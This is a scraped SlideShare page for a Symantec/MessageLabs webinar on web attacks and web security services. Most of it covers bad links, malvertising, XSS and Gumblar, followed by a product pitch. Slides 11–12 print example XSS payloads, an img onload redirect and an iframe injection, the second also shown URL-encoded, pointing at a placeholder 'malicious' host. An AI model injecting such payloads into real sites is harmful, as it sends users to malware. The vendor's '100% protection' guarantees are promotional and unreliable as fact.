Your SlideShare is downloading. ×
Anatomy Web Attack
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Introducing the official SlideShare app

Stunning, full-screen experience for iPhone and Android

Text the download link to your phone

Standard text messaging rates apply

Anatomy Web Attack

845
views

Published on

Published in: Technology

0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
845
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
0
Comments
0
Likes
2
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide
  • Kelly: Welcome to today’s session Anatomy of a Web Attack. Today, we will review an increasingly sophisticated and hostile environment that exists in today's Internet. In the case of those looking to harm your business, you have several things to consider. Our speaker Lee Rothman will walk you through the various types of attacks, the reason we think malware exists through the Web and what you can do to protect your business. Lee Rothman joined Symantec Hosted Services in 2006 as the principal system engineer of North America. Lee joined the engineering team with 10 years of Internet and security experience, specializing in Internetworking. Prior to Symantec Hosted Services, Lee spent several years as a sales engineer for a large integrator and was product marketing manager for a large Fortune 500 company. Lee acts as a product expert in North America and aids the Sales, Product, and Marketing teams. Lee, can you please take us through today’s session?
  • Today’s agenda is pretty simple. We are going to first go through the business challenges that companies face when it comes to the Web. I’ll then cover some statistics around the Web and how employees are using the Web in your organization. Finally, I will walk through a few examples of how attacks happen through the Internet. Finally, I will give some basic suggestions on how you can solve this problem.
  • Let’s first explore the business challenge. Disclaimer, Acme is not a real company. In this example, the Acme corporation faces a common problem, they want to allow their users business and reasonable personal web access but they want to make sure that they are protected against the common threats. As a business, Acme is really looking to solve these four issues. Productivity Offensive Materials Abuse of resources MalwareMost companies now face this challenge and are trying to manage this very real issue. Most companies haven’t really put a security issue in place because the security of the Web has not been an issue (or so they think) in their business. However, if we look at the data we can see some really compelling reasons why security for web should be considered.
  • Now that we know why they do it, what are the ways in which they get introduced to a company? I’ve put these types of attacks into 5 categoriesBad LinksAdvertisingXSSGumblar Web ServicesLet’s explore these categories in-depth.
  • Second, IT Managers should consider putting policies in place.
  • Third, IT Managers should consider monitoring their environments.
  • Lastly, IT Managers should be sure they have a malware protection place that is effective.
  • It’s important that we give a special thanks to our malware team in particular Martin Lee from our research and response team. Without his help, this webcast would not be possible.
  • Transcript

    • 1. Anatomy of a Web Attack
      1
    • 2. Agenda
      Challenges Corporation Face
      Web Usage Statistics
      Web Attacks
      Solving the Problem
      MessageLabs Services
    • 3. The Challenge
      The Acme corporation faces a common problem, they want to allow their users business and reasonable personal web access but they want to make sure that they are protected against the common threats:
      Productivity
      Offensive Materials
      Abuse of resources
      Malware
    • 4. Lots of websites
      Average 2,465 new malware websites per day.
    • 5. Why malware?
      Monetize the attack.
      • Install my software – botnet - spam / DDOS
      • 6. Steal your credentials - bank theft / fraud
      • 7. Steal your data – confidential data / fraud
    • How do you get it?
      Bad Links
      Advertising
      XSS
      Gumblar
      Services
      6
    • 8. Getting Web Malware
      Bad Link
      postcard.jpg.exe
    • 9. Advertise It
      Subvert a legitimate website
      Adverts
    • 10. Fake AV Advert
    • 11. XSS Attack
      User content
      No. Your wrong.
      Duh! Its “you’re”.
      I agree. <img src=“/images/smiley.gif”
      onload=“document.location=‘http://malicious/’”>
    • 12. XSS IFrame Attack
      http://genuine/index.php?search="'>
      <iframe src="http://malicious“
      height=“100%" width=“100%">
      </iframe>
      http://genuine/index.php?search="'>
      %3C%69%66%72%61%6D%65%20
      %73%72%63%3D%22%68%74%74
      %70%3A%2F%2F%6D%61%6C%69
      %63%69%6F%75%73%201C%20
      %0A%68%65%69%67%68%74%3D
      %201C%31%30%30%25%22%20
      %77%69%64%74%68%3D%201C
      %31%30%30%25%22%3E%0A%3C
      %2F%69%66%72%61%6D%65%3E%0A
    • 13. Web Malware
      Malware
      Malicious instructions
      Browser / JS / Flash / PDF
      Complete control
      Victim
      Bad Guy
    • 14. Gumblar Lifecycle
      User visits website with XSS exploit
      User is forwarded to host serving malware
      Malware installed (often flash or PDF)
      Malware steals website logins, forwards to hacker
      Hacker logs into website, installs XSS exploit
    • 15. Gumblar Prevalance
      Up to 60% of all malicious web traffic is Gumblar.
    • 16. How You Can Protect Yourself
      15
    • 17. Controlling the web
      IT Management should first consider controlling the Web;
      Policy engine includes:
      Categorised URL database
      MIME and file type lists
      Time periods
      User and group based policies
      Customizable block messages
      Controls HTTP and HTTPS
    • 18. Building the policy
      No access to travel, leisure and sport between 9am and 5pm
      No access to sex, guns or drugs
      No access to streaming audio and video (reduce bandwidth)
      Only support can download executables
    • 19. Monitoring access
      Dashboard – 1 year of high level information
      Detailed reports up to 6 months of URL and Malware information
      Customizable reports in PDF format
      Scheduled reports sent directly to your inbox
    • 20. Malware Protection
      Scans HTTP and FTP/HTTP traffic
      Multiple signature based AV engines
      Skeptic technology
      Customizable block messages
      Converged analysis
      No noticeable latency
    • 21. You have choices for Web Security
      20
    • 22. Why use a hosted services over hardware or software?
    • 23. Why use MessageLabs Services?
      Best Client and Technical Support
      Global Support is 24/7/365 & included with the service
      Support SLA protects your business
      Always get a live person who speaks your language
      Dedicated CSM team
      Best Services
      Awarding Winning
      Analyst approved
      Backed by strongest SLAs
    • 24. Most Robust Global Infrastructure
      Incorporating 14 data centers spanning four continents
      Every data center is scalable and secured to the highest standards
      Clustered high performance servers, each cluster has full redundancy within itself and all other hardware is duplicated
      23
    • 25. Best Service Level Agreements
      Web
      Anti-Virus Protection  100% protection from known and unknown email viruses
      Credit is offered if a client infected by a virus
      Anti-Virus Protection  100% protection against known viruses
      Credit is offered if a client infected by a virus
      Email
      Archiving
      Latency  Average scanning time of 100% of web content is within 100 milliseconds
      Credit is offered if latency exceeds 100 milliseconds
      Virus False Positives  0.0001% FP capture rate
      Credit is offered if we do not meet this commitment
      Service Availability  100% uptime
      Credit is offered if availability falls below 100%
      Client may terminate if availability falls below 95%
      Spam Capture Rate  99% capture rate (95% for emails containing Asian characters)
      Credit is offered if we do not meet this commitment
      Support
      Service Availability Guarantee 99.9% uptime for archiving network
      Client may terminate if availability falls below 90%
      Spam False Positives  0.0003% FP capture rate
      Credit is offered if we do not meet this commitment
      Appliance Replacement Guarantee If appliance fails during the warranty period, MessageLabs will repair or replace the appliance within 3 business days at no cost
      Latency  Average roundtrip time of 100% of email delivered in less than 60 seconds
      Credit is offered if latency exceeds 1 minute
      Delivery  100% delivery guarantee
      Client may terminate if we do not meet this
      Technical support / Fault Response critical - 95% calls within 2hrs; major - 85% calls within 4hrs; minor - 75% calls within 8hrs
      Credit is offered if we do not meet this commitment
      Service Availability  100% uptime
      Credit is offered if availability falls below 100%
      Client may terminate if availability falls below 95%
    • 26. Best Shared Intelligence
      Accuracy, Reliability & Performance
      The automatic sharing of knowledge gained in one protocol across all other protocols underpins MessageLabs Converged Threat Analysis. Security solutions that only focus on a single protocol such as email or web, or those that lack integration at the level of threat detection, may not sufficiently protect your business from malware and spyware designed to slip past single protocol security.
    • 27. Q&A
      Visit: www.MessageLabs.com
      Phone: 866.460.0000
      Email: Lrothman@MessageLabs.com
      26
    • 28. Special Thanks
      27
      Martin Lee MIET CISSP
      Research & Response Team
      Symantec Hosted Services